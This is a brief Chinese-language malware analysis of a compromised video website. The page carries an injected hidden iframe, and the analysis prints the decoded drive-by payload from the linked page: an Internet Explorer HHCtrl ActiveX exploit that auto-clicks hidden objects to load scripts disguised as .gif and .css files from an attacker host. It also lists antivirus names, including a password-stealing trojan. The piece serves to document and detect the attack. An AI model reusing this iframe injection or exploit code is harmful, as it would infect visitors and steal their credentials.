网页:
hxxp://www.****44mtv.com/vod/index1.htm
中被加入
<iframe src="hxxp://www.****26cd.com/test/index.htm" height="0" width="0" MARGINWIDTH="0" MARGINHEIGHT="0" HSPACE="0" VSPACE="0" FRAMEBORDER="0" SCROLLING="no"></iframe>
hxxp://www.****26cd.com/test/index.htm部分代码使用了escape()编码,unescape()后的内容为:
<SCRIPT>var Words="<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT><SCRIPT language=VScript src="bbs003302.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.****26cd.com/test/bbs003302.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT></BODY></HTML> ";document.write(unescape(Words))</SCRIPT>
下载2个文件:
1、bbs003302.css
Kaspersky报为Trojan-PSW.Win32.Lmir.atj
2、bbs003302.gif
瑞星报为Exploit.HHCtrl.Jiaozhu
Kaspersky报为exploit.VBS.Phel.m